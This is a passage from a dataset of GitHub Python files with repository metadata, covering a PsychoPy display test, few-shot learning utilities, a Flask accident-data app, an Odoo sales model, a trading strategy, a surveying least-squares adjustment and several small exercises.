list(range(1024))]\n\n# draw 10-bit lines at top of screen\nfor idx, bar_offset in enumerate(x_pos):\n\n line.start = [bar_offset, 500]\n line.end = [bar_offset, 0]\n\n line.lineColor = [list_10_bit[idx], list_10_bit[idx], list_10_bit[idx]]\n\n line.draw()\n\n# draw 8-bit lines at bottom of screen\nfor idx, bar_offset in enumerate(x_pos):\n\n line.start = [bar_offset, 0]\n line.end = [bar_offset, -500]\n\n line.lineColor = [list_8_bit[idx], list_8_bit[idx], list_8_bit[idx]]\n\n line.draw()\n\n\nwin.flip()\n\nwin.getMovieFrame()\npsychopy.event.waitKeys()\n\nwin.close()\n","repo_name":"Nickdotmartin/Cardiff","sub_path":"Nick_scripts/10_bit_test.py","file_name":"10_bit_test.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70922756091","text":"import bisect\n\nwith open('ordering.in') as f:\n for _ in range(int(f.readline())):\n line = list(map(int, f.readline().split()))\n K, arr = line[0], line[1:]\n order = []\n step_back = 0\n while len(arr) > 0:\n student = arr.pop(0)\n idx = bisect.bisect(order, student)\n step_back += len(order) - idx\n order.insert(idx, student)\n print(f'{K} {step_back}')\n f.close()\n","repo_name":"jowilf/MapcomTrainings-RYJ-","sub_path":"mapcom_test/ordering.py","file_name":"ordering.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"18264728142","text":"from .constants import BOARD_TEMPLATE\n\nclass Result:\n def __init__(self, status, index, x, y):\n self.status = status\n self.index = index\n self.x = x\n self.y = y\n\n @property\n def move(self):\n return (self.index, self.x, self.y)\n\n def __repr__(self):\n return \"Result({}, {}, {}, {})\".format(self.status, self.index, self.x, self.y)\n\n def __str__(self):\n ans = (\"Current Monoid: {}\\n\"\n \"Winning Position? 
{}\\n\"\n \"Last move was at the {} board\\n\").format(self.status, self.status.is_win(), self.index)\n stones = [' '] * 9\n stones[self.x * 3 + self.y] = 'X'\n ans += BOARD_TEMPLATE.format(*stones)\n return ans\n","repo_name":"oalieno/Notakto","sub_path":"Notakto/Result.py","file_name":"Result.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"19428126173","text":"\ndef select_batch(dataset, size, **kwds):\n from torch.utils.data import DataLoader\n for x in DataLoader(dataset, batch_size=size, shuffle=True, **kwds):\n return x\n\n\ndef prototype_fn(x):\n from torch import mean\n return mean(x, dim=0, keepdims=True)\n\n\ndef pairdist_fn(x, y):\n from torch import cdist\n x = x.unsqueeze(0)\n y = y.unsqueeze(0)\n return cdist(x, y, p=2).squeeze(0)\n\n\ndef dist_fn(x, y):\n from torch.nn.functional import pairwise_distance\n return pairwise_distance(x, y, p=2)\n\n\ndef episode(*datasets, features_fn, n_support=5, n_query=100, lambda_dist=0.4, lambda_class=1):\n from torch import cat, tensor\n from torch.nn.functional import cross_entropy\n\n prototypes = []\n for dataset in datasets:\n support = select_batch(dataset, n_support)\n support = features_fn(support)\n prototype = prototype_fn(support)\n assert prototype.size(0) == 1\n prototypes.append(prototype)\n prototypes = cat(prototypes, dim=0)\n\n total_loss = 0\n for i, dataset in enumerate(datasets):\n queries = select_batch(dataset, n_query)\n queries = features_fn(queries)\n\n prototype = prototypes[i].unsqueeze(0)\n temp = [1] * (queries.dim() - 1)\n prototype = prototype.repeat(queries.size(0), *temp)\n\n distances = dist_fn(queries, prototype)\n distance_loss = distances.mean()\n del distances\n\n scores = -pairdist_fn(queries, prototypes)\n labels = tensor([i] * scores.size(0)).to(scores.device)\n class_loss = cross_entropy(scores, labels)\n del scores, labels\n\n loss = lambda_dist * distance_loss + lambda_class * class_loss\n total_loss += loss\n\n return total_loss\n\n\ndef accuracy(*datasets, features_fn, n_support=5, n_query=100):\n from torch import cat, tensor, argmax, softmax\n\n prototypes = []\n for dataset in datasets:\n support = select_batch(dataset, n_support)\n support = features_fn(support)\n prototype = prototype_fn(support)\n assert prototype.size(0) == 1\n prototypes.append(prototype)\n prototypes = cat(prototypes, dim=0)\n\n total_correct = 0\n total_queries = 0\n for i, dataset in enumerate(datasets):\n queries = select_batch(dataset, n_query)\n queries = features_fn(queries)\n\n prototype = prototypes[i].unsqueeze(0)\n temp = [1] * (queries.dim() - 1)\n prototype = prototype.repeat(queries.size(0), *temp)\n\n scores = -pairdist_fn(queries, prototypes)\n preds = argmax(scores, dim=1)\n labels = tensor([i] * scores.size(0)).to(scores.device)\n\n correct = (preds == labels).sum()\n total_correct += correct.item()\n total_queries += queries.size(0)\n\n return total_correct / total_queries\n","repo_name":"josmople/pckt_fewshot","sub_path":"fewshot.py","file_name":"fewshot.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"41706652504","text":"import json\nimport requests\nimport os\nimport time\nimport sqlite3\n\n# метод получения страниц с необходимым нам фильтром\ndef getPage(page = 0):\n params = dict(text='1C',area=44,only_with_salary='true', page = page, per_page = 10)\n req = 
requests.get('https://api.hh.ru/vacancies', params)\n    data = req.content.decode(encoding='UTF8')\n    req.close()\n    return data\n\n#fetch the pages in a loop and write them to files in the pages folder\nfor page in range(0, 20):\n    jsObj = json.loads(getPage(page))\n    nextFileName = './docs/pagination/{}.json'.format(len(os.listdir(('./docs/pagination'))))\n    f = open(nextFileName, mode='w', encoding='utf8')\n    f.write(json.dumps(jsObj, ensure_ascii=False))\n    f.close()\n\n    if(jsObj['pages'] - page) <= 1:\n        break\n\n    time.sleep(0.25)\n","repo_name":"Wurberry/Telebot_hhru","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"29340671437","text":"from flask import Flask, render_template, jsonify, send_from_directory, request\nimport json\nimport pandas as pd\nimport numpy as np\nimport sqlite3 as sql\n\n#init app and class\napp = Flask(__name__)\n\n#initiate memory cache of database\nconn = sql.connect('data/amusement_accidents.db')\nquery = 'SELECT * FROM accidents'\ndf = pd.read_sql(query, conn)\nconn.close()\n\n# Route to render index.html template\n@app.route(\"/\")\ndef home():\n    return render_template(\"index.html\")\n\n@app.route(\"/getData\", methods=[\"GET\"])\ndef getData():\n    accident_dict = df.to_dict(orient='index')\n    accidents = jsonify(accident_dict)\n    return accidents\n####################################\n# ADD MORE ENDPOINTS\n###########################################\n#app route for bar chart\n@app.route(\"/bar\", methods=[\"GET\"])\ndef barChart():\n    moddedDF = df[[\"age_youngest\",\"num_injured\",\"gender\",\"year\"]]\n    boxchartdf = moddedDF.groupby(['gender']).num_injured.sum().reset_index()\n    boxData = []\n    for index, row in boxchartdf.iterrows():\n        box_plot = {'gender': row['gender'],\n                    'numInjured': row['num_injured']}\n        boxData.append(box_plot)\n    return jsonify(boxData)\n#app route for scatterplot\n@app.route(\"/scatter\", methods=[\"GET\"])\ndef scatterPlot():\n    moddedDF = df[[\"age_youngest\",\"num_injured\",\"gender\",\"year\"]]\n    agegroup = moddedDF[[\"age_youngest\",\"num_injured\",\"gender\",\"year\"]]\n    bins= [0,1,11,21,31,41,51,61,200]\n    labels = ['0','01-10','11-20','21-30','31-40','41-50','51-60','60+']\n    agegroup['AgeGroup'] = pd.cut(agegroup['age_youngest'], bins=bins, labels=labels, right=False)\n    scatterdf = agegroup.groupby('age_youngest').num_injured.sum().reset_index()\n    scatterData = []\n    for index, row in scatterdf.iterrows():\n        scatter_plot = {'age_youngest': row['age_youngest'],\n                        'numInjured': row['num_injured']}\n        scatterData.append(scatter_plot)\n    return jsonify(scatterData)\n#app route for piechart\n@app.route(\"/pie\", methods=[\"GET\"])\ndef pieChart():\n    device_category_pie = df[\"device_category\"].value_counts()\n    acc_by_device = []\n    for device, acc in device_category_pie.items():\n        device_sum = {'device': device,\n                      'numAccs': acc}\n        acc_by_device.append(device_sum)\n    return jsonify(acc_by_device)\n#app route for map\n@app.route('/USmap', methods=['GET'])\ndef buildMap():\n    accidents_by_state = df.groupby('acc_state').size()\n    acc_by_state = []\n    for state, acc in accidents_by_state.items():\n        state_sum = {'id': f'US.{state}',\n                     'value': acc}\n        acc_by_state.append(state_sum)\n    return jsonify(acc_by_state)\n\n\n#app route for table\n@app.route('/table', methods=['GET'])\ndef buildTable():\n    accident_dict = df.to_dict(orient='index')\n    accidents = []\n    for key, value in accident_dict.items():\n 
accidents.append(value)\n    return jsonify(accidents)\n\n#############################################################\n@app.after_request\ndef add_header(r):\n    \"\"\"\n    Add headers to both force latest IE rendering engine or Chrome Frame,\n    and also to prevent the rendered page from being cached.\n    \"\"\"\n    r.headers['X-UA-Compatible'] = 'IE=Edge,chrome=1'\n    r.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate, public, max-age=0\"\n    r.headers[\"Pragma\"] = \"no-cache\"\n    r.headers[\"Expires\"] = \"0\"\n    return r\n\n#main\nif __name__ == \"__main__\":\n    app.run(debug=True)\n","repo_name":"zarzarbinks0702/Theme-Park-Accident-Analysis","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"3072872548","text":"class PhotoAlbum:\n    MAX_PHOTO_COUNT = 4\n\n    def __init__(self, pages):\n        self.pages = pages\n        self.photos = [[] for page in range(pages)]\n        self.capacity = len(self.photos) * self.MAX_PHOTO_COUNT\n\n    @staticmethod\n    def has_avail_spots(photos, capacity):\n        photos_count = sum(len(page) for page in photos)\n        return photos_count < capacity\n\n    @staticmethod\n    def page_repr(page):\n        dash_separator = \"-----------\"\n        return f\"{dash_separator}\\n{' '.join('[]' for photo in page)}\\n\"\n\n    @classmethod\n    def from_photos_count(cls, photos_count):\n        pages = photos_count // 4\n        return cls(pages)\n\n    def add_photo_to_available_spot(self, label):\n        for i in range(len(self.photos)):\n            page_index = i + 1\n            page = self.photos[i]\n            if len(page) < self.MAX_PHOTO_COUNT:\n                page.append(label)\n                photo_index = page.index(label) + 1\n                return f\"{label} photo added successfully on page {page_index} slot {photo_index}\"\n\n    def add_photo(self, label):\n        if not self.has_avail_spots(self.photos, self.capacity):\n            return \"No more free spots\"\n\n        return self.add_photo_to_available_spot(label)\n\n    def display(self):\n        return \"\".join(self.page_repr(page) for page in self.photos) + \"-----------\\n\"\n\n\n# Test Code\nalbum = PhotoAlbum(2)\nalbum2 = PhotoAlbum.from_photos_count(16)\nprint(album2.pages)\n\nprint(album.add_photo(\"baby\"))\nprint(album.add_photo(\"first grade\"))\nprint(album.add_photo(\"eight grade\"))\nprint(album.add_photo(\"party with friends\"))\nprint(album.photos)\nprint(album.add_photo(\"prom\"))\nprint(album.add_photo(\"wedding\"))\nprint(album.display())","repo_name":"geodimitrov/Python-OOP-SoftUni","sub_path":"Attributes-Methods/Exercises/01. photo_album.py","file_name":"01. 
photo_album.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"16610929702","text":"# multiple linear regression\r\n# data preprocessing\r\n\r\n# import the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# load the data set\r\nimport os\r\n\r\ndataFile = os.path.normpath(\"C:/Users/n846490/Documents/Python Scripts/Multiple_Linear_Regression/50_Startups.csv\")\r\ndataset = pd.read_csv(dataFile)\r\n\r\n# get the X values\r\nX = dataset.iloc[:,0:4].values\r\nX\r\n\r\n# create the y value\r\ny = dataset.iloc[:,-1].values\r\ny\r\n\r\n# start with making them np.arrays\r\n\"\"\"\r\nX = np.array(dataset.iloc[:,0].values)\r\ny = np.array(dataset.iloc[:,1].values)\"\"\"\r\n\r\n# encoding categorical data\r\n# encoding tends to follow alphabetical order\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\nlabelencoder_X = LabelEncoder()\r\nX[:,3] = labelencoder_X.fit_transform(X[:,3])\r\nonehotencoder = OneHotEncoder(categorical_features = [3])\r\nX= onehotencoder.fit_transform(X).toarray()\r\n\r\n# avoiding the dummy variable trap\r\nX = X[:,1:]\r\n\r\n\r\n# split the data to training and testing\r\nfrom sklearn.cross_validation import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size = 0.2, random_state = 0)\r\n\r\n# feature scaling not always used\r\n\"\"\"from sklearn.preprocessing import StandardScaler\r\nsc_X = StandardScaler()\r\nX_train = sc_X.fit_transform(X_train)\r\nX_test = sc_X.transform(X_test)\"\"\"\r\n\r\n# Fitting the multiple linear regression to the training set\r\nfrom sklearn.linear_model import LinearRegression\r\nregressor = LinearRegression()\r\nregressor.fit(X_train, y_train)\r\n\r\n# predict the results\r\ny_pred = regressor.predict(X_test)\r\n\r\n# visualizing the test set results\r\nplt.scatter(y_pred, y_test, color = 'red')\r\nplt.title('Startup Profits (Test Set)')\r\nplt.xlabel('Predicted')\r\nplt.ylabel('Actual')\r\nplt.show()\r\n\r\n# building the optimal model using backward elimination\r\n# stats models does not include constant, need to create a 1 coefficent\r\n# need to append the X to the matrix to get the order correct\r\nimport statsmodels.formula.api as sm\r\nX = np.append(arr = np.ones((50,1)).astype(int), values = X, axis = 1)\r\n\r\n# start with the original matrix ad select the significance level\r\nX_opt = X[:, [0, 1, 2, 3, 4, 5]]\r\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\r\nregressor_OLS.summary()\r\n\r\n# based on output remove index 2\r\nX_opt = X[:, [0, 1, 3, 4, 5]]\r\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\r\nregressor_OLS.summary()\r\n\r\nX_opt = X[:, [0, 3]]\r\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\r\nregressor_OLS.summary()\r\n\r\n\r\n\r\n","repo_name":"bgbutler/PythonScripts","sub_path":"MachineLearning/MultipleLinearRegression.py","file_name":"MultipleLinearRegression.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72032722496","text":"#coding=utf-8\nfrom flask import Flask, jsonify, Blueprint, make_response, request, session, render_template\nfrom flask.ext.restful import reqparse, abort, Api, Resource\nfrom mongoengine import *\n\nfrom core.baseAPI import *\nfrom ucenter.provider.userProvider import UserProvider\nfrom ucenter.config import *\nfrom ucenter.web.userWeb import 
user_web\n\napp = Flask(CONST_SERVER_NAME)\n\nparser = reqparse.RequestParser()\nparser.add_argument('name', type=str)\nparser.add_argument('password', type=str)\nparser.add_argument('mobile', type=str)\nparser.add_argument('email', type=str)\n\nuserProvider = UserProvider()\n \nhome_web = Blueprint('home_web', __name__)\n\n@home_web.route('/', methods = ['GET'])\n@home_web.route('/index', methods = ['GET'])\n@login_required_web\ndef index():\n return render_template('index.html')\n\n@home_web.route('/welcome', methods = ['GET'])\ndef welcome():\n return render_template('welcome.html')\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"cdtschange/PythonKit","sub_path":"ucenter/web/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"8382007266","text":"from odoo import api, fields, models, _\n\nfrom odoo.exceptions import ValidationError\n\n\nclass SaleOrder(models.Model):\n _inherit = 'sale.order'\n\n timesheet_ids = fields.Many2many('account.analytic.line', compute='_compute_timesheet_ids', string='Timesheet activities associated to this sale')\n timesheet_count = fields.Float(string='Timesheet activities', compute='_compute_timesheet_ids')\n\n tasks_ids = fields.Many2many('project.task', compute='_compute_tasks_ids', string='Tasks associated to this sale')\n tasks_count = fields.Integer(string='Tasks', compute='_compute_tasks_ids')\n\n project_project_id = fields.Many2one('project.project', compute='_compute_project_project_id', string='Project associated to this sale')\n\n @api.multi\n @api.depends('project_id.line_ids')\n def _compute_timesheet_ids(self):\n for order in self:\n if order.project_id:\n order.timesheet_ids = self.env['account.analytic.line'].search(\n [('so_line', 'in', order.order_line.ids),\n ('amount', '<=', 0.0),\n ('project_id', '!=', False)])\n else:\n order.timesheet_ids = []\n order.timesheet_count = len(order.timesheet_ids)\n\n @api.multi\n @api.depends('order_line.product_id.project_id')\n def _compute_tasks_ids(self):\n for order in self:\n order.tasks_ids = self.env['project.task'].search([('sale_line_id', 'in', order.order_line.ids)])\n order.tasks_count = len(order.tasks_ids)\n\n @api.multi\n @api.depends('project_id.project_ids')\n def _compute_project_project_id(self):\n for order in self:\n order.project_project_id = self.env['project.project'].search([('analytic_account_id', '=', order.project_id.id)])\n\n @api.multi\n @api.constrains('order_line')\n def _check_multi_timesheet(self):\n for order in self:\n count = 0\n for line in order.order_line:\n if line.product_id.track_service == 'timesheet':\n count += 1\n if count > 1:\n raise ValidationError(_(\"You can use only one product on timesheet within the same sale order. 
You should split your order to include only one contract based on time and material.\"))\n return {}\n\n @api.multi\n def action_confirm(self):\n result = super(SaleOrder, self).action_confirm()\n for order in self:\n if not order.project_project_id:\n for line in order.order_line:\n if line.product_id.track_service == 'timesheet':\n if not order.project_id:\n order._create_analytic_account(prefix=line.product_id.default_code or None)\n order.project_id.project_create({'name': order.project_id.name, 'use_tasks': True})\n break\n return result\n\n @api.multi\n def action_view_task(self):\n self.ensure_one()\n action = self.env.ref('project.action_view_task')\n list_view_id = self.env.ref('project.view_task_tree2').id\n form_view_id = self.env.ref('project.view_task_form2').id\n\n result = {\n 'name': action.name,\n 'help': action.help,\n 'type': action.type,\n 'views': [[False, 'kanban'], [list_view_id, 'tree'], [form_view_id, 'form'], [False, 'graph'], [False, 'calendar'], [False, 'pivot'], [False, 'graph']],\n 'target': action.target,\n 'context': \"{'group_by':'stage_id'}\",\n 'res_model': action.res_model,\n }\n if len(self.tasks_ids) > 1:\n result['domain'] = \"[('id','in',%s)]\" % self.tasks_ids.ids\n elif len(self.tasks_ids) == 1:\n result['views'] = [(form_view_id, 'form')]\n result['res_id'] = self.tasks_ids.id\n else:\n result = {'type': 'ir.actions.act_window_close'}\n return result\n\n @api.multi\n def action_view_project_project(self):\n self.ensure_one()\n action = self.env.ref('project.open_view_project_all').read()[0]\n form_view_id = self.env.ref('project.edit_project').id\n\n action['views'] = [(form_view_id, 'form')]\n action['res_id'] = self.project_project_id.id\n action.pop('target', None)\n\n return action\n\n @api.multi\n def action_view_timesheet(self):\n self.ensure_one()\n action = self.env.ref('hr_timesheet.act_hr_timesheet_line')\n list_view_id = self.env.ref('hr_timesheet.hr_timesheet_line_tree').id\n form_view_id = self.env.ref('hr_timesheet.hr_timesheet_line_form').id\n\n result = {\n 'name': action.name,\n 'help': action.help,\n 'type': action.type,\n 'views': [[list_view_id, 'tree'], [form_view_id, 'form']],\n 'target': action.target,\n 'context': action.context,\n 'res_model': action.res_model,\n }\n if self.timesheet_count > 0:\n result['domain'] = \"[('id','in',%s)]\" % self.timesheet_ids.ids\n else:\n result = {'type': 'ir.actions.act_window_close'}\n return result\n\n\nclass SaleOrderLine(models.Model):\n _inherit = \"sale.order.line\"\n\n @api.model\n def create(self, values):\n line = super(SaleOrderLine, self).create(values)\n if line.state == 'sale' and not line.order_id.project_id and line.product_id.track_service in ['timesheet', 'task']:\n line.order_id._create_analytic_account()\n return line\n\n @api.multi\n def _compute_analytic(self, domain=None):\n if not domain and self.ids:\n # To filter on analyic lines linked to an expense\n expense_type_id = self.env.ref('account.data_account_type_expenses', raise_if_not_found=False)\n expense_type_id = expense_type_id and expense_type_id.id\n domain = [('so_line', 'in', self.ids), '|', ('amount', '<=', 0.0), ('project_id', '!=', False)]\n return super(SaleOrderLine, self)._compute_analytic(domain=domain)\n","repo_name":"guohuadeng/odoo10-x64","sub_path":"source/odoo/addons/sale_timesheet/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} 
+{"seq_id":"34670344228","text":"import talib\nimport numpy as np\n\n# 全局变量定义\nM = 5\nN = 5\nMaxPositionNum = 3 # 最大开仓数\nStopPoint = 30 # 止损点\nWinPoint = 100 # 止赢点\nFloatStopStart = 50 # 浮动止损开始点\nFloatStopPoint = 20 # 浮动止损点\n\nHHV = np.array([])\nLLV = np.array([])\n\nContractId = 'SHFE|F|CU|1908'\n\ndef initialize(context): \n global ContractId\n SetBarInterval(ContractId, 'M', 1, 500)\n\ndef handle_data(context):\n global ContractId\n\n # 最少获取10根数据\n bars = HisBarsInfo()\n barLen = len(bars)\n if barLen < 10:\n return\n\n close = bars[-1][\"LastPrice\"]\n pclose = bars[-2][\"LastPrice\"]\n high = bars[-1][\"HighPrice\"]\n phigh = bars[-2][\"HighPrice\"]\n low = bars[-1][\"LowPrice\"]\n plow = bars[-2][\"LowPrice\"]\n\n # 求M周期最高\n HHV = Highest(High().tolist(), M)\n # 求N周期最低\n LLV = Lowest(Low().tolist(), N)\n\n PlotNumeric(\"LAST_HHV\", HHV[-2], RGB_Red())\n PlotNumeric(\"LAST_LLV\", LLV[-2], RGB_Green())\n\n if high > HHV[-2]:\n if (CurrentContracts() < MaxPositionNum) or (MarketPosition() < 0):\n Buy(1, high)\n elif low < LLV[-2]:\n if (abs(CurrentContracts()) < MaxPositionNum) or (MarketPosition() > 0):\n SellShort(1, low)\n \n # 止损\n SetStopPoint(StopPoint)\n # 止赢\n SetWinPoint(WinPoint)\n # 浮动止损, 暂不支持\n #SetFloatStopPoint(FloatStopStart, FloatStopPoint)\n\n\n\n","repo_name":"XiaoCoco/learn_pyqt5","sub_path":"strategy/示例策略/唐氏通道交易系统.py","file_name":"唐氏通道交易系统.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"38612332006","text":"class Solution:\n def dominantIndex(self, nums: List[int]) -> int:\n \n if len(nums) == 0:\n return -1\n \n biggest = 0\n \n for i in range(1, len(nums)):\n if nums[i] > nums[biggest]:\n biggest = i\n \n second_biggest = (biggest + 1) % len(nums)\n \n for i in range(len(nums)):\n if i != biggest and nums[i] > nums[second_biggest]:\n second_biggest = i \n \n if nums[biggest] >= nums[second_biggest] * 2:\n return biggest\n else:\n return -1\n \n","repo_name":"yanvoi/leetcode_solutions","sub_path":"Easy/747LargestNumberAtLeastTwiceOfOthers.py","file_name":"747LargestNumberAtLeastTwiceOfOthers.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"72814653374","text":"import math\nimport numpy\nfrom observations import Observation\nfrom coordinates import Coordinate\nfrom utils import get_coordiante_by_name, get_set_up_points, ddeg_to_rad, get_distance\nfrom utils import get_direction, fprint\n\nnumpy.set_printoptions(linewidth=300, suppress=True)\n\ndef read_coordinates_file(path='coordinates.txt'):\n\tcoordinates = []\n\twith open(path) as f:\n\t content = f.readlines()\n\t for line in content:\n\t \tline = line.replace('\\n', '')\n\t \tif len(line.split('\t')) == 4:\n\t \t\tname = line.split('\t')[0]\n\t \t\ty = float(line.split('\t')[1].replace('+', ''))\n\t \t\tx = float(line.split('\t')[2].replace('+', ''))\n\t \t\ttype_ = line.split('\t')[3]\n\t\t \tcoordinates.append(Coordinate(\n\t\t \t\tline_from_file=line,\n\t\t \t\tname = name,\n\t\t \t\ty = y,\n\t\t \t\tx = x,\n\t\t \t\ttype_ = type_,\n\t \t\t))\t\n\treturn coordinates\n\ndef read_observations_file(path='observations.txt'):\n\tcoordinates = read_coordinates_file()\n\tobservations = []\n\twith open(path) as f:\n\t\tcontent = f.readlines()\n\t\tfor line in content:\n\t\t\tline = line.replace('\\n', '')\n\t\t\tif len(line.split('\t')) == 4:\n\t\t\t\tfrom_point = 
get_coordiante_by_name(line.split('\t')[0], coordinates)\n\t\t\t\tto_point = get_coordiante_by_name(line.split('\t')[1], coordinates)\n\t\t\t\ttype_ = line.split('\t')[2]\n\t\t\t\tif type_ == 'direction':\n\t\t\t\t\tvalue = ddeg_to_rad(line.split('\t')[3].split(' '))\n\t\t\t\telif type_ == 'distance':\n\t\t\t\t\tvalue = float(line.split('\t')[3])\n\t\t\t\telse:\n\t\t\t\t\traise Exception('Dont the type of obseravtion')\n\t\t\t\tobservations.append(Observation(\n\t\t\t\t\tline_from_file=line,\n\t\t\t\t\tfrom_point = from_point,\n\t\t\t\t\tto_point = to_point,\n\t\t\t\t\ttype_ = type_,\n\t\t\t\t\tvalue = value,\n\t\t\t\t))\n\treturn observations\n\nobservations = read_observations_file()\nset_up_points = get_set_up_points(observations)\nnumber_of_set_ups = len(set_up_points)\n\n\nA = numpy.matrix([\n\t\t[0, 0] + [0] * number_of_set_ups,\n ])\nA = numpy.delete(A, (0), axis=0)\n\nl = numpy.matrix([\n\t\t[0],\n ])\nl = numpy.delete(l, (0), axis=0)\n\nP = numpy.matrix([\n\t\t[0] * len(observations),\n ])\nP = numpy.delete(P, (0), axis=0)\n\ni = 0\nfor observation in observations:\n P = numpy.vstack([P, [0] * len(observations)])\n if observation.type_ == 'direction': \n P.itemset((i, i), 1)\n if observation.type_ == 'distance': \n P.itemset((i, i), 15625 * 4)\n i = i + 1\n\nobservation_number = 1\nn = 0\nfor set_up_point_name in set_up_points:\n for observation in observations:\n if observation.from_point.name == set_up_point_name:\n row = [0, 0] + [0] * number_of_set_ups\n observed = None\n calculated = None\n if observation.type_ == 'direction':\n observed = observation.value\n calculated = get_direction(observation.from_point, observation.to_point)\n if observation.to_point.type_ == 'provisional':\n d = get_distance(observation.to_point, observation.from_point)\n y = 206264.8 * (observation.to_point.x - observation.from_point.x) / d**2\n x = -206264.8 * (observation.to_point.y - observation.from_point.y) / d**2\n row[0], row[1] = y, x\n row[1 + observation_number] = -1\n A = numpy.vstack([A, row])\n if observation.to_point.type_ == 'fixed':\n n = n + 1\n row[1 + observation_number] = -1\n A = numpy.vstack([A, row])\n oc = (math.degrees(observed-calculated)*3600)\n l = numpy.vstack([l, oc])\n\t\t\t\t\n observation_number = observation_number + 1\n\nfor observation in observations:\n row = [0, 0] + [0] * number_of_set_ups\n if observation.type_ == 'distance':\n distance = observation.value\n y = -(observation.to_point.y - observation.from_point.y) / distance\n x = -(observation.to_point.x - observation.from_point.x) / distance\n row[0], row[1] = y, x\n A = numpy.vstack([A, row])\n observed = distance\n calculated = get_distance(observation.to_point, observation.from_point)\n oc = observed - calculated\n l = numpy.vstack([l, oc])\n\nX = ((A.T) * P * A).I * (A.T) * P * l\nV = (A * X) - l\nAtPA = A.T * P * A\nAtPL = A.T * P * l\nvariance_factor = (V.T * V) / (n - (2 + number_of_set_ups) )\nsigma_X = float(variance_factor) * (AtPA).I\nsigma_L = float(variance_factor) * A * (AtPA).I * A.T\n\nfprint (str(sigma_X), 'sigma_x.txt')\nfprint (str(sigma_L), 'sigma_l.txt')\nfprint (str(A), 'A.txt')\nfprint (str(V), 'V.txt')\nfprint (str(l), 'l.txt')\nfprint (str(variance_factor), 'variance_factor.txt')\nfprint (str(X), 'X.txt')\n","repo_name":"jasrusable/APG2014S_LSA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"43558389441","text":"import torch\nimport 
torch.nn as nn\nfrom torch.nn import init\n\nimport math\nimport numpy as np\n\ndef conv(batchNorm, in_planes, out_planes, kernel_size=3, stride=1):\n if batchNorm:\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=(kernel_size-1)//2, bias=False),\n nn.BatchNorm2d(out_planes),\n nn.LeakyReLU(0.1,inplace=True)\n )\n else:\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=(kernel_size-1)//2, bias=True),\n nn.LeakyReLU(0.1,inplace=True)\n )\n\ndef i_conv(batchNorm, in_planes, out_planes, kernel_size=3, stride=1, bias = True):\n if batchNorm:\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=(kernel_size-1)//2, bias=bias),\n nn.BatchNorm2d(out_planes),\n )\n else:\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=(kernel_size-1)//2, bias=bias),\n )\n\ndef predict_flow(in_planes):\n return nn.Conv2d(in_planes,2,kernel_size=3,stride=1,padding=1,bias=True)\n\ndef deconv(in_planes, out_planes):\n return nn.Sequential(\n nn.ConvTranspose2d(in_planes, out_planes, kernel_size=4, stride=2, padding=1, bias=True),\n nn.LeakyReLU(0.1,inplace=True)\n )\n\nclass tofp16(nn.Module):\n def __init__(self):\n super(tofp16, self).__init__()\n\n def forward(self, input):\n return input.half()\n\n\nclass tofp32(nn.Module):\n def __init__(self):\n super(tofp32, self).__init__()\n\n def forward(self, input):\n return input.float()\n\n\ndef init_deconv_bilinear(weight):\n f_shape = weight.size()\n heigh, width = f_shape[-2], f_shape[-1]\n f = np.ceil(width/2.0)\n c = (2 * f - 1 - f % 2) / (2.0 * f)\n bilinear = np.zeros([heigh, width])\n for x in range(width):\n for y in range(heigh):\n value = (1 - abs(x / f - c)) * (1 - abs(y / f - c))\n bilinear[x, y] = value\n weight.data.fill_(0.)\n for i in range(f_shape[0]):\n for j in range(f_shape[1]):\n weight.data[i,j,:,:] = torch.from_numpy(bilinear)\n\n\ndef save_grad(grads, name):\n def hook(grad):\n grads[name] = grad\n return hook\n'Parameter count : 38,676,504 '\n\nclass 